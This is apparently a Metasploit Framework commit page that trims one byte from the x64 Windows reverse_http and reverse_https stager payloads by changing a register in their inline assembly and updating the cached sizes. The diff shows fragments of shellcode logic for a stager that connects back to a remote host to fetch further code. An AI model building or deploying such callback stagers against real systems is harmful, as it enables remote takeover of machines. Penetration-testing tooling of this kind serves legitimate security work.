Skip to content

Commit 9fddc21

Browse files
committed
Shaved another sneaky byte off the payload
1 parent 6e96e6d commit 9fddc21

File tree

3 files changed

+5
-5
lines changed

3 files changed

+5
-5
lines changed

lib/msf/core/payload/windows/x64/reverse_http.rb

Lines changed: 3 additions & 3 deletions
Original file line numberDiff line numberDiff line change
@@ -233,7 +233,7 @@ def asm_reverse_http(opts={})
233233
asm << %Q^
234234
xor r9, r9 ; lpszProxyBypass (NULL)
235235
push rbx ; stack alignment
236-
push rbx ; dwFlags (0)
236+
push rbx ; dwFlags (0)
237237
mov r10, #{Rex::Text.block_api_hash('wininet.dll', 'InternetOpenA')}
238238
call rbp
239239
@@ -305,8 +305,8 @@ def asm_reverse_http(opts={})
305305
pop r8 ; lpszObjectName (URI)
306306
xor r9, r9 ; lpszVersion (NULL)
307307
push rbx ; dwContext (0)
308-
mov r10, #{"0x%.8x" % http_open_flags} ; dwFlags
309-
push r10
308+
mov rax, #{"0x%.8x" % http_open_flags} ; dwFlags
309+
push rax
310310
push rbx ; lplpszAcceptType (NULL)
311311
push rbx ; lpszReferer (NULL)
312312
mov r10, #{Rex::Text.block_api_hash('wininet.dll', 'HttpOpenRequestA')}

modules/payloads/stagers/windows/x64/reverse_http.rb

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -9,7 +9,7 @@
99

1010
module Metasploit4
1111

12-
CachedSize = 488
12+
CachedSize = 487
1313

1414
include Msf::Payload::Stager
1515
include Msf::Payload::Windows

modules/payloads/stagers/windows/x64/reverse_https.rb

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -9,7 +9,7 @@
99

1010
module Metasploit4
1111

12-
CachedSize = 522
12+
CachedSize = 521
1313

1414
include Msf::Payload::Stager
1515
include Msf::Payload::Windows

0 commit comments

Comments
 (0)